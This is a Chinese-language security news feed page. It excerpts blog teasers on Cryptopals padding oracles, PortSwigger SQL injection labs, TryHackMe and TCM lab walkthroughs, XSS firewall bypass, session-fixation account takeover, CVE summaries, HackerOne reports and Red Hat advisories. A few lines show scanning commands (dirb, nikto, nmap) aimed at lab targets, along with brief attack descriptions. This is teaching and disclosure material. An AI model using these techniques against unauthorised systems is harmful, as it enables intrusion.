Cybersecurity information flow

干净的信息流推送工具,偏向安全圈的点点滴滴,为安全研究人员每日发现优质内容.

了解更多 »

最近更新
时间 节点
2024年5月25日 03:02 nccgroup
Hello and welcome back to the Cryptopals Guided Tour (previously, previously)! Today we are taking on Challenge 17, the famous padding oracle attack. For those who don’t know, Cryptopals is a series of eight sets of challenges covering common cryptographic constructs and common attacks on them. You can read more about Cryptopals at https://cryptopals.com/. There’s a […]

" 您好,欢迎回到密码学之旅(之前,再之前!)!今天我们将挑战第17关,那就是著名的填充密码攻击。对于不知道的人来说,Cryptopals是一系列八个挑战,涵盖了常见的密码学构建和针对它们的常见攻击。您可以在https://cryptopals.com/了解更多关于Cryptopals的信息。这是一个……"
2024年5月25日 01:13 Github关注
基于大语言模型和多向量数据库的知识库问答系统白盒化解决方案
2024年5月25日 01:13 Github关注
a collection of resources around LLMs, aggregated for the workshop "Mastering LLMs: End-to-End Fine-Tuning and Deployment" by Dan Becker and Hamel …
2024年5月25日 01:13 Github关注
💡 LeetCode in C++20/Java/Python/MySQL/TypeScript (respect coding conventions)
2024年5月25日 00:26 Stories by SAFARAS K A on Medi
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…
Continue reading on InfoSec Write-ups »

" 探索CVE-2024-4761,这是Chrome的V8 JavaScript引擎中的一个越界写入漏洞,了解其技术细节和影响……\n继续阅读Infosec Write-ups »"
2024年5月25日 00:26 Stories by SAFARAS K A on Medi
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs. But setting all that aside, today I want to share how I achieved every beginner bug hunter’s dream: scoring that first bounty. Still gives me chills just thinking about it!
So, without further ado, let’s dive into the details of this exhilarating experience.
Let’s get Started
The most important takeaway from this blog is simple:
Keep learning about different vulnerabilities and, more importantly, put that newly gained knowledge into practice. There are hundreds and thousands of websites out there waiting to be hunted, with millions of vulnerabilities just waiting to be discovered by someone.
Further Details
Here’s how it all went down. The bug that landed me my first bounty was actually a combination of two bugs:
GraphQL API key leak & cache poisoning.
The target? A private one I stumbled upon using some good ol’ Google dorking. (Psst, here’s a handy repo for some similar G
2024年5月25日 00:25 Stories by SAFARAS K A on Medi
How Search Engines Operate and Utilize Hidden Content
Continue reading on InfoSec Write-ups »

" 搜索引擎的运作原理及利用隐藏内容\n继续阅读InfoSec Write-ups »"
2024年5月25日 00:25 Stories by SAFARAS K A on Medi
In the Name of Allah, the Most Beneficent, the Most Merciful.
All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind, jinns and all that exists).
Let’s just begin with what brings us here today (giggled amusingly).
Portswigger SQLi labs con’td(Link to the First writeup)
Lab3: SQL injection attack, listing the database contents on non-Oracle databases
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
Solution
Most database types (except Oracle) have a set of views called the information schema. This provides inf
2024年5月25日 00:25 Stories by SAFARAS K A on Medi
Photo by Onur Binay on Unsplash
In an era where traditional passwords are increasingly vulnerable to cyber threats, biometric authentication emerges as a promising solution to enhance security and user convenience. Biometric authentication methods, such as facial recognition, fingerprint scanning, and iris recognition, leverage unique physical or behavioral characteristics to verify an individual’s identity. While biometrics offer numerous benefits, including improved security and usability, they also pose certain challenges, ranging from technical vulnerabilities to ethical concerns. This article delves into the advancements, vulnerabilities, and ethical considerations surrounding biometric authentication.
Advancements in Biometric Authentication
Biometric authentication has witnessed significant advancements in recent years, driven by advancements in technology and increasing adoption across various industries. Some notable advancements include:
Multimodal Biometrics: Combining multiple biometric modalities
2024年5月25日 00:24 Stories by SAFARAS K A on Medi
OK, maybe ‘ultimate weapon’ is a bit strong. But hear me out…
What Do the Cool Kids Do?
If you browse the Internet for ‘cyber security projects’ you’re likely to come across things like the installation of technical tools, such as Wazuh, Pi-hole, or OpenVAS. These tools are fantastic and such projects can be a lot of fun, but what will they be protecting? As the old adage goes, “A band is only as good as its drummer” [1]. I’ve come to believe that a cyber security setup is only as good as its lists.
Five Cybersecurity Memes and What They Say About Cybersecurity Today (isaca.org)
Take a look at this,
“Please list the quantities and operating systems for your laptops, desktops and virtual desktops within the scope of this assessment”
This is text taken from section A2.4 in the ‘Montpellier’ release of the UK Cyber Essentials framework [2]. Other sections ask for lists of software, internet browsers, any open network ports, and which users have admin rights to which systems.
Another example comes from the NIST C
2024年5月25日 00:23 Stories by SAFARAS K A on Medi
CVE-2023–52424, also known as the SSID Confusion Attack, has brought new challenges to wireless network security.
Continue reading on InfoSec Write-ups »

" CVE-2023-52424,又称SSID混淆攻击,为无线网络安全带来了新的挑战。请继续阅读InfoSec Write-ups上的相关内容。"
2024年5月25日 00:23 Stories by SAFARAS K A on Medi
Fingerprinting Databases: SQLi (Oracle, MySQL, MS)
In the Name of Allah, the Most Beneficent, the Most Merciful.
All the praises and thanks be to Allah, the Lord of the ‘Alamin (mankind, jinns and all that exists).
I will start with Lab 3 of PortSwigger Academy. Please note that I don’t solve the labs at once; I keep trying and failing until I get it right. Sometimes I check the solution and then figure out a different way to solve it.
Lab 1 : SQL injection attack, querying the database type and version on Oracle
This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Objective
Solution
I selected the Pets category and tested its vulnerability by adding a single quote after “Pets,” resulting in an internal server error. I tried several times to confirm the number of columns available in the table by:
NOTE: Continue making changes until you receive an error, which will indicate the number of columns just before t
2024年5月25日 00:22 Stories by SAFARAS K A on Medi
In the realm of ethical hacking and penetration testing, the quest to uncover vulnerabilities and secure systems is a thrilling adventure. In this journey, we’ll dive into my experience with the “Pickle Rick” TryHackMe challenge. I’ll take you through the steps I followed, revealing the valuable lessons learned along the way.
Step 1: Information Gathering
Every successful penetration test starts with information gathering. The goal is to collect as much data as possible about the target. I began by accessing the website and inspecting its source code for hints. On line 28–32, I stumbled upon a hidden clue within a comment:
```
<! —
Note to self, remember username!
Username: R1ckRul3s
→
```
This crucial discovery hinted at a login page, implying that both a username and password would be required. To further explore potential vulnerabilities, I conducted content discovery using tools like dirb and nikto.
dirb http://Ip_address
nikto -h http://Ip_address
Step 2: Scanning and Enumeration
Understanding the target
2024年5月25日 00:22 Stories by SAFARAS K A on Medi
We all hate web application firewall! Most likely you have encountered those while testing for cross-site-scripting. If you manage to get HTML injection which is the initial step, you know that there must be a bug out there. Let me help you to bypass this annoying thing and get that bounty on the table! It’s time to head dive into more techniques for bypassing some web protection. We will explore how those protections are implemented and how we can find ways to overcome them.
https://medium.com/media/5fd48e7f111b1d70da0235d450185442/href
Initial Setup
This is the setup I will be using:
On the left, we can see the client, a CloudFlare firewall in the middle will be as a proxy server to the CTF server on the right. The CTF server is labs.hackxpert.com which is made by XSSRat. He has some nice content related to XSS as well. Instead of going directly to labs.hackxpert.com, the requests will be sent through my CloudFlare, just to demonstrate from the defensive side, how it looks, how engineers are making blocking
2024年5月25日 00:21 Stories by SAFARAS K A on Medi
TCM Academy Walkthrough :Linux Privilege Escalation
#Bankai
Academy is a purposely vulnerable virtual machine (VM) that is used for testing and practicing penetration testing techniques. It is designed by TCM Security under the capstone of practical ethical hacking course.
Academy.7z
I got the IP address using: sudo arp-scan -l. Then, I checked if it is running a web service or not. As expected, it is running a web service.
I checked out Wappalyzer for information about the web.
I came prepared for it with my arsenal. I call out to nmap, then fired the IP using:
nmap -A -T4 -p- 192.168.57.252
Nmap result
I logged in as ftp on port 21 since it allows anonymous login(ftp/ftp):
I downloaded the note.txt file to my machine, and I found some useful information in it.
So there is a login portal. I tried content discovery using Dirb, but the output is too much with different response codes such as 403, 401, 200, etc. So I tried ffuf and indicated the responses I needed, which are 200 and 301.
i navigated to /academy
2024年5月25日 00:21 Stories by SAFARAS K A on Medi
From GeeksForGeeks
There are numerous ways you can handle an authorization on your website. From session-based authentication to token-based authorization, any method you consider to use has to be properly configured or else the whole application might become prone to potential account takeovers.
In my case tho, although the target was horribly configured, it was not exploitable by itself. It had to be chained with other potential stuff to reach impact.
Lets call the main target I performed account takeover on weakauth.main.com .
Quite simply, the target was written in ASP.NET.
Upon first time visiting the website, you are issued a cookie called ASP.NET_SessionId which is totally unauthorized and unprivileged.
Set-Cookie: ASP.NET_SessionId=doonz8hcdquy72tkvfflqy34d;
Now this cookie has 0 privileges.
This is where vulnerability comes in play: when I authenticate myself in the website, I’m not issued a new session cookie. That previous cookie of mine stays, Its just upgraded now.
This allows me to perform the a
2024年5月25日 00:21 Stories by SAFARAS K A on Medi
Discover the technical breakdown of CVE-2024–4761, an out-of-bounds write vulnerability in Chrome’s V8 JavaScript engine, its impact…
Continue reading on InfoSec Write-ups »

" 探索CVE-2024-4761,这是Chrome的V8 JavaScript引擎中的一个越界写入漏洞,了解其技术细节和影响……\n继续阅读Infosec Write-ups »"
2024年5月25日 00:21 Stories by SAFARAS K A on Medi
Long time no see! I’ve been a bit preoccupied with other tasks besides bug bounty hunting, so I haven’t had the chance to post any blogs. But setting all that aside, today I want to share how I achieved every beginner bug hunter’s dream: scoring that first bounty. Still gives me chills just thinking about it!
So, without further ado, let’s dive into the details of this exhilarating experience.
Let’s get Started
The most important takeaway from this blog is simple:
Keep learning about different vulnerabilities and, more importantly, put that newly gained knowledge into practice. There are hundreds and thousands of websites out there waiting to be hunted, with millions of vulnerabilities just waiting to be discovered by someone.
Further Details
Here’s how it all went down. The bug that landed me my first bounty was actually a combination of two bugs:
GraphQL API key leak & cache poisoning.
The target? A private one I stumbled upon using some good ol’ Google dorking. (Psst, here’s a handy repo for some similar G
2024年5月25日 00:20 Stories by SAFARAS K A on Medi
CVE-2023–52424, also known as the SSID Confusion Attack, has brought new challenges to wireless network security.
Continue reading on InfoSec Write-ups »

" CVE-2023-52424,也称为SSID混淆攻击,为无线网络安全带来了新的挑战。请继续阅读InfoSec Write-ups上的相关内容。"
2024年5月25日 00:13 hackone
影响厂商:HackerOne 奖励: 危险等级:medium
" 不足的编辑暴露了通过“ShareReportViaEmail” GraphQL端点敏感信息的风险。"
2024年5月25日 00:13 hackone
影响厂商:Internet Bug Bounty 奖励: 危险等级:low
" [CVE-2024-26146] 解析头文件可能导致潜在的服务拒绝漏洞"
2024年5月25日 00:13 hackone
影响厂商:b'Internet Bug Bounty'(https://hackerone.com/ibb) 
" [CVE-2024-26146] 解析头文件可能导致潜在的拒绝服务漏洞"
2024年5月25日 00:13 hackone
影响厂商:b'HackerOne'(https://hackerone.com/security) 
" 不良的编辑暴露了通过“ShareReportViaEmail” GraphQL端点发布的敏感信息。"
2024年5月25日 00:13 SecWiki周报
溯源比特币与真实案例细节分析流程 https://mp.weixin.qq.com/s/bxJ3tSEOGnyTy-Ck7mRn0Q
[SecData]-暗网流量公开数据集-1 https://mp.weixin.qq.com/s/5BKa9KDU-Kggc_WMQ1XBGw
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3321-03 - An update for pcp is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

" 红帽安全公告2024-3321-03 - 现已为Red Hat Enterprise Linux 9.2扩展更新支持提供pcp更新。"
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3322-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

" 红帽安全公告2024-3322-03 - 现已为Red Hat Enterprise Linux 8.8扩展更新支持提供pcp更新。"
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3323-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.

" 红帽安全公告2024-3323-03 - 现已为Red Hat Enterprise Linux 8.4高级关键更新支持、Red Hat Enterprise Linux 8.4电信更新服务和Red Hat Enterprise Linux 8.4 SAP解决方案更新服务提供pcp更新。"
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3324-03 - An update for pcp is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

" 红帽安全公告2024-3324-03 - 现已为红帽企业Linux 8.6扩展更新支持提供pcp更新。"
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3325-03 - An update for pcp is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

" 红帽安全公告2024-3325-03 - 现已为Red Hat Enterprise Linux 9.0扩展更新支持提供pcp更新。"
2024年5月24日 23:44 Packet Storm
Red Hat Security Advisory 2024-3338-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass and use-after-free vulnerabilities.

" 红帽安全公告2024-3338-03 - 适用于Red Hat Enterprise Linux 8.2高级更新支持的Thunderbird更新现已可用。解决的问题包括绕过和在使用后释放漏洞。"